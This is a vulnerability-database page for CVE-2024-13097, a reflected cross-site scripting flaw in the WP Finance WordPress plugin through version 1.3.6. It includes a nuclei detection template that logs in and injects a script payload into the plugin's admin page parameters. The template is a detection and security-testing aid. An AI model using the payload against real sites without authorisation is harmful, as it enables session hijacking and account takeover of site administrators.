Lucene search
K

WP Finance Plugin <= 1.3.6 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Reflected cross-site scripting in the WordPress WP Finance plugin up to version 1.3.6; requires clicking a malicious link; update the plugin.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13097
1 Feb 202506:15
circl
CNNVD
WordPress plugin WP Finance 安全漏洞
1 Feb 202500:00
cnnvd
CVE
CVE-2024-13097
1 Feb 202506:00
cve
Cvelist
CVE-2024-13097 WP Finance <= 1.3.6 - Reflected XSS
1 Feb 202506:00
cvelist
EUVD
EUVD-2024-51338
3 Oct 202520:07
euvd
NVD
CVE-2024-13097
1 Feb 202506:15
nvd
OSV
CVE-2024-13097
1 Feb 202506:15
osv
Patchstack
WordPress WP Finance plugin <= 1.3.6 - Reflected XSS vulnerability
3 Feb 202522:03
patchstack
Positive Technologies
PT-2025-1996
1 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13097
23 May 202507:11
redhatcve
Rows per page
id: CVE-2024-13097

info:
  name: WP Finance Plugin <= 1.3.6 - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP Finance WordPress plugin <= 1.3.6 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before output, letting attackers execute scripts in high privilege users' browsers, exploit requires victim to click a malicious link.
  impact: |
    Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of WP Finance plugin that addresses this issue or apply security patches that sanitize and escape output properly.
  reference:
    - https://wpscan.com/vulnerability/d83d7274-55ae-4f35-b65e-6d6e19e36fac/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13097
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-13097
    cwe-id: CWE-79
    epss-score: 0.00674
    epss-percentile: 0.47664
    cpe: cpe:2.3:a:mch0lic:wp_finance:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mch0lic
    product: wp_finance
  tags: cve,cve2024,wp-finance,wp,wordpress,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wpfinance&menu=css"></script><script>alert(document.domain)</script><script>&date1=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "></script><script>alert(document.domain)</script><script>", "WP Finance")
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100daeebad2fd5669dfe191a38c7395d9f48d96c75479ddb587ed84793c143dd8f3022100c8d08d7b655f2ed15d1af5571324c5217a4cc83e52e57ec0eba5407d81a0036e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:26Current
7.1High risk
Vulners AI Score7.1
CVSS 3.15.4
EPSS0.00674
SSVC
12